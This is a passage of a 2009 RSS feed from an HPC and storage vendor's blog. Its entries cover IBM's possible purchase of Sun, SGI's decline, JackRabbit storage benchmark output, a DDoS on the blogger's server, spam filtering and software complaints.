      <description>John L over at InsideHPC writes about an article that appears in the print version of the New York Times. In this article, John notes that IBM is scouring Sun Microsystems contracts &amp;hellip; well, their lawyers are doing due diligence, in large part, to help figure out if there is something of value there. John opines that there are many things of great value. As I see it, the market has indicated otherwise, by valuing Sun Micro stock where it is now.</description>
    </item>
    
    <item>
      <title>Failblog ... couldn&#39;t stop lau...</title>
      <link>https://blog.scalability.org/2009/03/failblog-couldnt-stop-lau/</link>
      <pubDate>Fri, 20 Mar 2009 02:11:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/failblog-couldnt-stop-lau/</guid>
      <description>Failblog &amp;hellip; couldn&amp;rsquo;t stop laughing at this &amp;hellip; http://tinyurl.com/c2qm4o</description>
    </item>
    
    <item>
      <title>Eek!  /. on an exploit against processors ...</title>
      <link>https://blog.scalability.org/2009/03/eek-on-an-exploit-against-processors/</link>
      <pubDate>Thu, 19 Mar 2009 18:39:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/eek-on-an-exploit-against-processors/</guid>
      <description>Nasty. See the link</description>
    </item>
    
    <item>
      <title>DDoS saga continues ... the revenge of the attacked (mwahahaha!)</title>
      <link>https://blog.scalability.org/2009/03/ddos-saga-continues-the-revenge-of-the-attacked-mwahahaha/</link>
      <pubDate>Thu, 19 Mar 2009 17:20:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/ddos-saga-continues-the-revenge-of-the-attacked-mwahahaha/</guid>
      <description>They pissed me off &amp;hellip; driving my load up from 0.00 to 0.01 like that &amp;hellip; Using up the &amp;hellip; I don&amp;rsquo;t know &amp;hellip; 10kB/minute &amp;hellip; bandwidth &amp;hellip; Look at the blue arrow. This is where I told our &amp;hellip; sentry &amp;hellip; to get a little more proactive about &amp;hellip; defense.
[ ](/images/DDoS_revenge_of_the_attacked.png)
It&amp;rsquo;s a start. Their network is a scale-free net. We could collapse it fairly easily. In fact, I am thinking about readying that change, so if I need it (that is, if they get serious about mailbombing us, and not this pretty wimpy thing here), I can turn it on at a moment&amp;rsquo;s notice.</description>
    </item>
    
    <item>
      <title>3 ... 2 ... 1 ....  Yup, DDoS begins ...</title>
      <link>https://blog.scalability.org/2009/03/3-2-1-yup-ddos-begins/</link>
      <pubDate>Thu, 19 Mar 2009 12:46:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/3-2-1-yup-ddos-begins/</guid>
      <description>It&amp;rsquo;s like clockwork, I tell ya &amp;hellip; Like clockwork &amp;hellip;
[ ](/images/DDoS-March-2009.png)
I could set my watch by this &amp;hellip;</description>
    </item>
    
    <item>
      <title>Parrot hits 1.0</title>
      <link>https://blog.scalability.org/2009/03/parrot-hits-10/</link>
      <pubDate>Wed, 18 Mar 2009 20:52:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/parrot-hits-10/</guid>
      <description>Parrot you say? Think of it as the engine which underlies Perl6 and quite a few other dynamic languages &amp;hellip;
One engine to run them all, and in the computer, bind them. Hopefully this means (also) that Perl6 will formally ship this Christmas. The running joke is that it will ship around Christmas, only the year is indeterminate.
More seriously, I&amp;rsquo;ve been using Perl and dynamic languages in general for more than a decade.</description>
    </item>
    
    <item>
      <title>Sun (possibly) to be acquired by IBM?</title>
      <link>https://blog.scalability.org/2009/03/sun-possibly-to-be-acquired-by-ibm/</link>
      <pubDate>Wed, 18 Mar 2009 13:05:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/sun-possibly-to-be-acquired-by-ibm/</guid>
      <description>The NYT reports talks in progress. Not sure if it&amp;rsquo;s real. Need to think on this somewhat &amp;hellip; makes sense as Sun is so cheap, but like many other acquisitions, this one is likely to give some folks a real bad case of indigestion. There are a few elements of Sun worth having, and some &amp;hellip; not so much. Will be interesting to see if this is real, and if so, what the market impact would be.</description>
    </item>
    
    <item>
      <title>HPC @ Cisco?</title>
      <link>https://blog.scalability.org/2009/03/hpc-cisco/</link>
      <pubDate>Tue, 17 Mar 2009 00:40:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/hpc-cisco/</guid>
      <description>Cisco announced a new product today, code named California. You can read some of the info here. This system, also known more formally as a &amp;ldquo;Unified Computing System&amp;rdquo; aims to integrate computing, networking and storage into a single managed system. Cisco appears to be aiming for what it believes to be a sweet spot in virtualized infrastructures. Their play appears to be focused upon virtualization. They tied in a slew of players on the software stack side, and Accenture on the services side.</description>
    </item>
    
    <item>
      <title>Why is (the) Sun trying to peek out from behind the clouds (of computing)</title>
      <link>https://blog.scalability.org/2009/03/why-is-the-sun-trying-to-peak-out-from-behind-the-clouds-of-computing/</link>
      <pubDate>Mon, 16 Mar 2009 12:10:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/why-is-the-sun-trying-to-peak-out-from-behind-the-clouds-of-computing/</guid>
      <description>Maybe later on this week I&amp;rsquo;ll write up a more detailed set of things I&amp;rsquo;ve been thinking of, while I see another &amp;ldquo;fad&amp;rdquo; grip the computing world. Until then, John West at InsideHPC.com asks why Sun is coming back to the cloud table. John points out
I&amp;rsquo;ll save my &amp;ldquo;cloud&amp;rdquo; comments until the future article. Though I might point out that for a new investment in technology to build a cloud computing facility, the business model generally needs you to spend as little as possible per system and per gigabyte of storage.</description>
    </item>
    
    <item>
      <title>It is sure to be removed, so look at this ASAP</title>
      <link>https://blog.scalability.org/2009/03/it-is-sure-to-be-removed-so-look-at-this-asap/</link>
      <pubDate>Sat, 14 Mar 2009 20:37:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/it-is-sure-to-be-removed-so-look-at-this-asap/</guid>
      <description>Back at SGI, the company did a pitiful job explaining who it was, what it did, and how it did it, not to mention why it was important. This is basic, simple, get-the-message-out marketing. In the 90&amp;rsquo;s, SGI was a great company. We had, at the time, great products. And, as we naively believed that the world would beat a path to our door in order to get them, we sorta &amp;hellip; kinda &amp;hellip; forgot to tell people about what we did and why it was important.</description>
    </item>
    
    <item>
      <title>ok, looks like it is mostly on...</title>
      <link>https://blog.scalability.org/2009/03/ok-looks-like-it-is-mostly-on/</link>
      <pubDate>Sat, 14 Mar 2009 17:13:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/ok-looks-like-it-is-mostly-on/</guid>
      <description>ok, looks like it is mostly one way &amp;hellip; oh well &amp;hellip; [update] Nope &amp;hellip; bidirectional &amp;hellip; with a bit of latency though. I now have Wordpress talking nicely with twitter, and Wordpress and LinkedIn tied together. Scary. Social networking gone wild. Too bad there are few if any business models that will work for these folks.</description>
    </item>
    
    <item>
      <title>testing the reverse link.... t...</title>
      <link>https://blog.scalability.org/2009/03/testing-the-reverse-link-t/</link>
      <pubDate>Sat, 14 Mar 2009 17:09:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/testing-the-reverse-link-t/</guid>
      <description>testing the reverse link&amp;hellip;. twitter to blog &amp;hellip; Content free post, just testing shiny new tools (everyone say &amp;ldquo;oooohhh&amp;rdquo;)</description>
    </item>
    
    <item>
      <title>WPtwitter test 1 of 2, from WP to twitter ...</title>
      <link>https://blog.scalability.org/2009/03/wptwitter-test-1-of-2-from-wp-to-twitter/</link>
      <pubDate>Sat, 14 Mar 2009 16:42:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/wptwitter-test-1-of-2-from-wp-to-twitter/</guid>
      <description>this is a test, had this been an actual post, you would have been given content to read &amp;hellip;</description>
    </item>
    
    <item>
      <title>Also working on some business ...</title>
      <link>https://blog.scalability.org/2009/03/also-working-on-some-business/</link>
      <pubDate>Sat, 14 Mar 2009 16:12:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/also-working-on-some-business/</guid>
      <description>Also working on some business proposals/models to pursue a number of funding (equity/etc) opportunities.</description>
    </item>
    
    <item>
      <title>Working on storage software up...</title>
      <link>https://blog.scalability.org/2009/03/working-on-storage-software-up/</link>
      <pubDate>Sat, 14 Mar 2009 16:12:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/working-on-storage-software-up/</guid>
      <description>Working on storage software updates. Making the software simpler/easier to use. Working on the web interface to status/updates.</description>
    </item>
    
    <item>
      <title>On HPC benchmarking: measure and report the important things that users care about ... wall clock time</title>
      <link>https://blog.scalability.org/2009/03/on-hpc-benchmarking-measure-and-report-the-important-things-that-users-care-about-wall-clock-time/</link>
      <pubDate>Thu, 12 Mar 2009 12:54:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/on-hpc-benchmarking-measure-and-report-the-important-things-that-users-care-about-wall-clock-time/</guid>
      <description>John West at InsideHPC.com points to a great article this morning from Intel. Well, ok, I didn&amp;rsquo;t agree with the initial tone.
This is a bit on the (negative) sensationalist side, though the author is correct in pointing out that these technologies have been overhyped. I&amp;rsquo;ve been using a phrase to discuss this and other issues for a while. There are no silver bullets. Or as Robert Heinlein once wrote, TANSTAAFL.</description>
    </item>
    
    <item>
      <title>Been avoiding talking about SGI ... but it looks like a whole slew of events is about to get started</title>
      <link>https://blog.scalability.org/2009/03/been-avoiding-talking-about-sgi-but-it-looks-like-a-whole-slew-of-events-is-about-to-get-started/</link>
      <pubDate>Thu, 12 Mar 2009 02:39:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/been-avoiding-talking-about-sgi-but-it-looks-like-a-whole-slew-of-events-is-about-to-get-started/</guid>
      <description>John West at InsideHPC has a brief article on SGI, noting that they have received their second delisting notice. As of now SGI, a company where I spent 6 years and really enjoyed my time (apart from the decisions various company senior management made), and which hit a $4B valuation at one point, is currently worth $5.24M.
SGI was once a great company. What made SGI great were the people, some of whom are still there.</description>
    </item>
    
    <item>
      <title>1.3 PB lustre OSSes/OSTs with ...</title>
      <link>https://blog.scalability.org/2009/03/13-pb-lustre-ossesosts-with/</link>
      <pubDate>Wed, 11 Mar 2009 18:03:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/13-pb-lustre-ossesosts-with/</guid>
      <description>1.3 PB lustre OSSes/OSTs with a Velocibunny MDS quote &amp;hellip; under $800k &amp;hellip; wow!</description>
    </item>
    
    <item>
      <title>1.3PB Lustre system with a Velocibunny MDS for ~$800k USD</title>
      <link>https://blog.scalability.org/2009/03/13pb-lustre-system-with-a-velocibunny-mds-for-800k-usd/</link>
      <pubDate>Wed, 11 Mar 2009 17:48:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/13pb-lustre-system-with-a-velocibunny-mds-for-800k-usd/</guid>
      <description>This was a fun exercise, not sure if our WAG is in the right ball-park though, as some of the elements won&amp;rsquo;t have real price tags for a while. This was an intelligent guess based upon comparable systems pricing. 28x 4U 48 TB JackRabbit (JR4) units with 32 GB ram, 2x QDR IB ports, 2x SSD boot drives in a RAID1 + a &amp;ldquo;Velocibunny&amp;rdquo; MDS (1.5 TB of the fastest non-RAMdisk based server around) running Lustre.</description>
    </item>
    
    <item>
      <title>Generating quote after quote a...</title>
      <link>https://blog.scalability.org/2009/03/generating-quote-after-quote-a/</link>
      <pubDate>Wed, 11 Mar 2009 15:56:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/generating-quote-after-quote-a/</guid>
      <description>Generating quote after quote after &amp;hellip; no rest for the wicked &amp;hellip;</description>
    </item>
    
    <item>
      <title>debugging iscsi issues on two ...</title>
      <link>https://blog.scalability.org/2009/03/debugging-iscsi-issues-on-two/</link>
      <pubDate>Wed, 11 Mar 2009 04:16:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/debugging-iscsi-issues-on-two/</guid>
      <description>debugging iscsi issues on two different kernels &amp;hellip; yay &amp;hellip;</description>
    </item>
    
    <item>
      <title>tweet tweet</title>
      <link>https://blog.scalability.org/2009/03/tweet-tweet/</link>
      <pubDate>Wed, 11 Mar 2009 03:43:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/tweet-tweet/</guid>
      <description>Maybe I am not such an old fogey &amp;hellip; on twitter now. What&amp;rsquo;s next &amp;hellip; facebook? Darn &amp;hellip; I purposely went all Luddite over MySpace &amp;hellip; was hoping to do the same thing with facebook. Now how to figure out how to link to the blog &amp;hellip;</description>
    </item>
    
    <item>
      <title>Don&#39;t know why this is the case ...</title>
      <link>https://blog.scalability.org/2009/03/dont-know-why-this-is-the-case/</link>
      <pubDate>Tue, 10 Mar 2009 00:33:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/dont-know-why-this-is-the-case/</guid>
      <description>As part of the toolchain for JackRabbit and ΔV, we depend upon Perl and various Perl modules. Previously, for DragonFly&amp;rsquo;s prior incarnation, we built our own toolchain. The issue is that the Perl distributed with RHEL/Centos, Debian/Ubuntu usually includes some &amp;hellip; er &amp;hellip; ill-advised patches. We had built our own in the past, and it suited us well, as it felt faster. Well, for a number of reasons we are back at it.</description>
    </item>
    
    <item>
      <title>Day Job: Think Smart! Academic &amp; Research Stimulus Sale</title>
      <link>https://blog.scalability.org/2009/03/day-job-think-smart-academic-research-stimulus-sale/</link>
      <pubDate>Mon, 02 Mar 2009 21:16:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/day-job-think-smart-academic-research-stimulus-sale/</guid>
      <description>Tis the season for sales &amp;hellip; this one targeted at academia/research &amp;hellip; See the link for details. JackRabbit, our tightly coupled processing and storage system that unabashedly dominates performance among units of similar density, at a much lower price point, lowers that price point even more for research/education/academic customers. You can get a 48 TB raw JackRabbit unit which, as we have noted before, sustains 1.57 GB/s on writes, and 1.</description>
    </item>
    
    <item>
      <title>Starting to play with git</title>
      <link>https://blog.scalability.org/2009/02/starting-to-play-with-git/</link>
      <pubDate>Sun, 01 Mar 2009 04:25:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/starting-to-play-with-git/</guid>
      <description>Been a mercurial user for a while, mercurial was IMO more mature when we started using it about 1.5 years ago. Git was new, and not quite as easy to deal with. What a difference 1.5 years make. I find starting/importing new projects with Mercurial harder than I like. It&amp;rsquo;s not bad, it just takes a bit more thinking than I want during import. So I tried git tonight. Imported the deltaV tools in.</description>
    </item>
    
    <item>
      <title>The hard part about hiring ...</title>
      <link>https://blog.scalability.org/2009/02/the-hard-part-about-hiring/</link>
      <pubDate>Sat, 28 Feb 2009 05:24:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/the-hard-part-about-hiring/</guid>
      <description>&amp;hellip; is in not knowing if the people are able to do what you need them to do. So far, I can say I have found (and kept) one great person. I haven&amp;rsquo;t been too successful at finding good HPC people otherwise.
I was saddened to hear that a friend had been let go by his employer. I suggested considering us. And up until yesterday, I was under the impression I had my next great person.</description>
    </item>
    
    <item>
      <title>Upped sustained speeds on new JackRabbit unit</title>
      <link>https://blog.scalability.org/2009/02/upped-sustained-speeds-on-new-jackrabbit-unit/</link>
      <pubDate>Wed, 25 Feb 2009 04:45:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/upped-sustained-speeds-on-new-jackrabbit-unit/</guid>
      <description>I forgot to mention this. Odd. Our updated JackRabbit (JR4, f.k.a. JRM) unit has been burning in over the last few days for a customer. Putting obscene loads on it. Trying hard to crash it. Really.
From fio (apart from the 4M buffer size issue, I really like fio)
streaming-write: (groupid=0, jobs=1): err= 0: pid=12270 write: io=6,397GiB, bw=1,498MiB/s, iops=365, runt=4479113msec clat (msec): min=1, max=4,560, avg= 2.73, stdev=10.33 bw (KiB/s) : min= 0, max=2427840, per=101.</description>
    </item>
    
    <item>
      <title>Security in the cloud</title>
      <link>https://blog.scalability.org/2009/02/security-in-the-cloud/</link>
      <pubDate>Wed, 25 Feb 2009 03:10:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/security-in-the-cloud/</guid>
      <description>I don&amp;rsquo;t mean to rain on anyone&amp;rsquo;s cloud (ok &amp;hellip; ok &amp;hellip; been wanting to say that &amp;hellip; ), but the double whammy of Google&amp;rsquo;s GMail and now zero-day phishing attack starts begging some serious questions of risk and security in &amp;ldquo;the cloud&amp;rdquo;. Ok, I know, there are many different clouds. Ones within a firewall and local to a campus, ones external to a firewall or at a remote campus. There are SaaS, PaaS, and-any-other-letter-you-wish-aaS type apps.</description>
    </item>
    
    <item>
      <title>Finally ...</title>
      <link>https://blog.scalability.org/2009/02/finally/</link>
      <pubDate>Wed, 25 Feb 2009 02:17:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/finally/</guid>
      <description>&amp;hellip; the day job accepts credit cards (Visa, MC, AMEX) directly. A long &amp;hellip; long &amp;hellip; time ago, I was critical of one of my former employers for not doing this &amp;hellip; pointing out that we had lost sales as a result of it. I do not believe in erecting barriers to users buying what we sell. I want to streamline the processes and make them easier. Faster. Better.
We are working very hard at getting a better web-store up (I have seen the new one and it is good) so that our customers can order Delta-V&amp;rsquo;s, JackRabbits, Pegasus and Pegasus-GPU systems online as simply as a few mouse clicks (and some credit card information).</description>
    </item>
    
    <item>
      <title>Updated JackRabbit M bonnie data</title>
      <link>https://blog.scalability.org/2009/02/updated-jackrabbit-m-bonnie-data/</link>
      <pubDate>Tue, 24 Feb 2009 00:02:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/updated-jackrabbit-m-bonnie-data/</guid>
      <description>Continuing a previous thread, here is data from a recent RAID6 JackRabbit test. This is a 24 bay, 24 TB machine, with 64 GB ram, 8 processor cores, 1x DDR IB port, 2x GbE.
[root@jackrabbit ~]# iozone -s 32g -r 2048 -t 4 -F /big/f.0 /big/f.1 /big/f.2 /big/f.3 Iozone: Performance Test of File I/O Version $Revision: 3.315 $ Compiled for 64 bit mode. Build: linux Contributors:William Norcott, Don Capps, Isom Crawford, Kirby Collins Al Slater, Scott Rhine, Mike Wisner, Ken Goss Steve Landherr, Brad Smith, Mark Kelly, Dr.</description>
    </item>
    
    <item>
      <title>&#34;Top HPC trends&#34; ... or are they?</title>
      <link>https://blog.scalability.org/2009/02/top-hpc-trends-or-are-they/</link>
      <pubDate>Mon, 23 Feb 2009 12:03:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/top-hpc-trends-or-are-they/</guid>
      <description>John West at InsideHPC.com links to an article I read last week and didn&amp;rsquo;t comment on. In this article David Driggers, CTO at Verari, points out what he believes to be the top 5 trends in HPC. In no particular order, he points out that CAS (content addressable storage) is &amp;ldquo;breakthrough technology&amp;rdquo; for archiving. Which is odd. In that industry insiders appear to have a somewhat different opinion on the value of CAS for archiving.</description>
    </item>
    
    <item>
      <title>on the test track</title>
      <link>https://blog.scalability.org/2009/02/on-the-test-track/</link>
      <pubDate>Sat, 21 Feb 2009 18:41:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/on-the-test-track/</guid>
      <description>One of the issues often raised in discussions with users is the IOP performance of JackRabbit. We have measured our 24 bay unit performance at a bit more than 5000 IOPs (8k random reads, as closely matching a test case handed to us by a customer looking at a competitive box, which scored under 4300 IOPs on the same test). The problem is that getting consistent workable tools to do this measurement is hard &amp;hellip; windows users use IOmeter, other users will use SPC-1 and related.</description>
    </item>
    
    <item>
      <title>Quick set of new JR4 (renamed JRM) bonnie&#43;&#43; numbers</title>
      <link>https://blog.scalability.org/2009/02/quick-set-of-new-jr4-renamed-jrm-bonnie-numbers/</link>
      <pubDate>Fri, 20 Feb 2009 18:32:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/quick-set-of-new-jr4-renamed-jrm-bonnie-numbers/</guid>
      <description>New firmware on controllers, new drivers, still haven&amp;rsquo;t worked all the tuning out perfectly yet, but getting there.
[root@&amp;lt;a href=&amp;quot;http://scalableinformatics.com/jackrabbit&amp;quot;&amp;gt;jackrabbit&amp;lt;/a&amp;gt; ~]# bonnie++ -u root -d /raid60 -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.94 ------Sequential Output------ --Sequential Input- --Random- Concurrency 1 -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jackrabbit 124G 887738 98 285392 46 1182583 96 417.</description>
    </item>
    
    <item>
      <title>Been super busy ...</title>
      <link>https://blog.scalability.org/2009/02/been-super-busy/</link>
      <pubDate>Fri, 20 Feb 2009 18:30:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/been-super-busy/</guid>
      <description>&amp;hellip; with orders, support, coding, customer visits, proposals &amp;hellip; Will resume posting again shortly &amp;hellip;</description>
    </item>
    
    <item>
      <title>Seagate announces Constellation drives ... on their web site ...</title>
      <link>https://blog.scalability.org/2009/02/seagate-announces-constellation-drives-on-their-web-site/</link>
      <pubDate>Mon, 16 Feb 2009 16:12:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/seagate-announces-constellation-drives-on-their-web-site/</guid>
      <description>Seagate has created a new line of drives, named Constellation. Spec&amp;rsquo;s look good, capacities up to 2TB on 3.5&amp;quot; version. SAS v2 (6.0 Gbps) as well as SATA. As soon as we can get our hands on these, we will start working on qualifying them for JackRabbit and ΔV. 96TB in 5U, 48TB in 4U, 32TB in 3U, 24TB in 2U.</description>
    </item>
    
    <item>
      <title>Open Source Venture Capital by Mark Cuban</title>
      <link>https://blog.scalability.org/2009/02/open-source-venture-capital-by-mark-cuban/</link>
      <pubDate>Thu, 12 Feb 2009 01:47:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/open-source-venture-capital-by-mark-cuban/</guid>
      <description>Maybe we should pitch? I dunno (we are looking for capital to grow and hire people &amp;hellip; go figure). Here is his post. His criteria are simple, and quite good:
That is, for him to invest, you have to open your idea up. If it is defensible, and you have a shot, he might sign on. However, he might not. How is this different from the VC meet/greet events that you have to pay $1000+ for, in order to present your idea to &amp;ldquo;funders&amp;rdquo;?</description>
    </item>
    
    <item>
      <title>GPU-HMMer press release out ... with a pointer to our new Pegasus-GPU product</title>
      <link>https://blog.scalability.org/2009/02/gpu-hmmer-press-release-out-with-a-pointer-to-our-new-pegasus-gpu-product/</link>
      <pubDate>Thu, 05 Feb 2009 02:50:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/gpu-hmmer-press-release-out-with-a-pointer-to-our-new-pegasus-gpu-product/</guid>
      <description>As usual, Doug works his magic, comes through in a pinch. See our link. GPU-HMMer measurements giving about 100x on 3 GPUs over a Shanghai AMD processor that forms the computing substrate for the GPUs. But we are also pointing to Pegasus-GPU, which is our new GPU box powered by Tesla GPUs from NVIDIA. We should have pictures up soon (unit is in lab, glowing a faint blue &amp;hellip;). Data sheets, product sheets and &amp;hellip; wait for it &amp;hellip; online ordering &amp;hellip; coming very shortly.</description>
    </item>
    
    <item>
      <title>Buying a JackRabbit ...  $X.  Inability of Paypal to process payments ...  Priceless ...</title>
      <link>https://blog.scalability.org/2009/02/jackrabbit-x-inability-of-paypal-to-process-payments-priceless/</link>
      <pubDate>Tue, 03 Feb 2009 18:33:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/jackrabbit-x-inability-of-paypal-to-process-payments-priceless/</guid>
      <description>We are shopping for a new merchant services provider thanks in part to Paypal and its rather annoying rules. Like not being able to process transactions over $10k USD. Oh sure, they could do it if they wanted to &amp;hellip; but they don&amp;rsquo;t want to. Ask them, and they will tell you that it is against Federal law. Thats what they told me a while ago. Ask Paymentech or Authorize.net and you will hear something different.</description>
    </item>
    
    <item>
      <title>um ... er ... don&#39;t go there ... please ...</title>
      <link>https://blog.scalability.org/2009/02/um-er-dont-go-there-please/</link>
      <pubDate>Tue, 03 Feb 2009 14:02:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/um-er-dont-go-there-please/</guid>
      <description>This isn&amp;rsquo;t a political blog, and this isn&amp;rsquo;t a political post. This is a blog about HPC, and the business of HPC. Which is global. Which means that HPC is impacted by political winds as surely as the political winds themselves blow. Most of the time we can ignore it. Some of the time, bad ideas emerge. John West at InsideHPC.com pointed out some of the rhetoric circling about the massive spending bill under consideration in the US government.</description>
    </item>
    
    <item>
      <title>SGE list appears to be broken</title>
      <link>https://blog.scalability.org/2009/01/sge-list-appears-to-be-broken/</link>
      <pubDate>Sat, 31 Jan 2009 23:29:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/sge-list-appears-to-be-broken/</guid>
      <description>Can&amp;rsquo;t post from my email account, the one subscribed to, and receiving SGE email. Claims I am not subscribed. Ok. Then I try from the gmail account. Accepts my subscription. And then doesn&amp;rsquo;t let me respond. Borked mailing lists are no fun. I screwed up the mpihmmer list for a while (by accident) without realizing it. Fixing them is even less fun (mailman is &amp;hellip; well &amp;hellip; a multi-cup-of-coffee-diagnostic-event) Hopefully someone will ping the list admins to investigate.</description>
    </item>
    
    <item>
      <title>OT:  Ramping up spam protection</title>
      <link>https://blog.scalability.org/2009/01/ot-ramping-up-spam-protection/</link>
      <pubDate>Sat, 31 Jan 2009 22:02:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ot-ramping-up-spam-protection/</guid>
      <description>I have been displeased with the massive upswing in spam, and not looking forward to 30-40k spam messages next month. So I did some research on the additional features of our MTA, and then did some analysis of the spam we had. With a few quick changes, focusing on where/from whom we were getting the most spam, I instituted and tested some additional filter elements.
If you get caught in this filter and need to let me know, contact me through gmail.</description>
    </item>
    
    <item>
      <title>On dynamical systems and climatology</title>
      <link>https://blog.scalability.org/2009/01/on-dynamical-systems-and-climatology/</link>
      <pubDate>Sat, 31 Jan 2009 16:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/on-dynamical-systems-and-climatology/</guid>
      <description>That all of these are modeled on HPC gives me the tie-in to HPC that we need. I think we need more theoretical development, modeling, and model refinement. HPC systems accord us virtual laboratories that allow us to create and probe state spaces that may be impossible to consider in an experimental sense otherwise. And this is, IMO, where we need to spend more time/effort/cycles.
Sadly we have political views impinging into scientific research, and this is problematic.</description>
    </item>
    
    <item>
      <title>Do more.  Spend less.</title>
      <link>https://blog.scalability.org/2009/01/do-more-spend-less/</link>
      <pubDate>Wed, 28 Jan 2009 22:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/do-more-spend-less/</guid>
      <description>This has become our mantra. There is a nice article in The Economist about this. JackRabbit provides best-of-breed performance for what it does, and it also costs less than other solutions. Quite a bit less in most cases. While we are hearing, from customers and users, of &amp;ldquo;orders of magnitude&amp;rdquo; better performance (their words &amp;hellip; multiple customers) than competitive boxes, we are emphasizing the less stress on the budget aspect.</description>
    </item>
    
    <item>
      <title>48TB ΔV4 for about $18k USD</title>
      <link>https://blog.scalability.org/2009/01/48tb-v4-for-about-18k-usd/</link>
      <pubDate>Wed, 28 Jan 2009 21:40:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/48tb-v4-for-about-18k-usd/</guid>
      <description>Just ran through the configuration pricing model on it. 48TB ΔV4 came out around $18k USD. Add in a dual port 10GbE NIC for $500, and you have a seriously awesome iSCSI target box (not to mention a very very fast NFS / CIFS box). Wow. We are refreshing/updating our ΔV line for 1Q2009, so expect some new pricing bits soon.</description>
    </item>
    
    <item>
      <title>96TB in 5U: coming soon to a JackRabbit near you</title>
      <link>https://blog.scalability.org/2009/01/96tb-in-5u-coming-soon-to-a-jackrabbit-near-you/</link>
      <pubDate>Tue, 27 Jan 2009 05:13:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/96tb-in-5u-coming-soon-to-a-jackrabbit-near-you/</guid>
      <description>Engadget is reporting (thanks Andrew!) that 2TB drives are about to ship from Western Digital. In the face of Seagate&amp;rsquo;s &amp;hellip; er &amp;hellip; firmware issues I think we are going to see Western Digital drives in JackRabbits soon as a standard option.
Not sure if these are enterprise drives going on sale (not likely, betting they are consumer drives), but we have customers that want these. 48 of these in 5U.</description>
    </item>
    
    <item>
      <title>About to pass a dubious milestone ...</title>
      <link>https://blog.scalability.org/2009/01/about-to-pass-a-dubious-milestone/</link>
      <pubDate>Mon, 26 Jan 2009 23:00:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/about-to-pass-a-dubious-milestone/</guid>
      <description>[update: 8:49am 27-Jan-2009] Yup &amp;hellip; my spam-box is at 20012 and counting. [update 2: 8:29am 31-Jan-2009] 25188 and counting &amp;hellip; wassamatta, they couldn&amp;rsquo;t get me to 30k by the end of the month (16 hours away)? Sheesh &amp;hellip; On a positive note, Thunderbird is able to handle a 25188-email box without problem. I remember when 1000 emails would give email clients fits &amp;hellip; Our spam filter is a pipeline. It can handle quite a load &amp;hellip; we have been email bombed before, and far from causing the server conniptions, it handles it quite well.</description>
    </item>
    
    <item>
      <title>Pulling no punches:  Firefox 3.x sucks</title>
      <link>https://blog.scalability.org/2009/01/pulling-no-punches-firefox-3x-sucks/</link>
      <pubDate>Sat, 24 Jan 2009 16:21:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/pulling-no-punches-firefox-3x-sucks/</guid>
      <description>Having used it, watched it crash, hog memory, stall, screw up rendering, &amp;hellip; I have to wonder exactly what the Mozilla corporation is thinking by releasing this stinking pile of bits. My laptop is a dual core Intel machine with 2.5 GB ram, and a fast 7200 RPM SATA drive. And it is brought to its knees by firefox 3.0. A third of ram gets snarfed by it immediately upon running.</description>
    </item>
    
    <item>
      <title>An &#34;ouch&#34; moment</title>
      <link>https://blog.scalability.org/2009/01/an-ouch-moment/</link>
      <pubDate>Thu, 22 Jan 2009 18:12:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/an-ouch-moment/</guid>
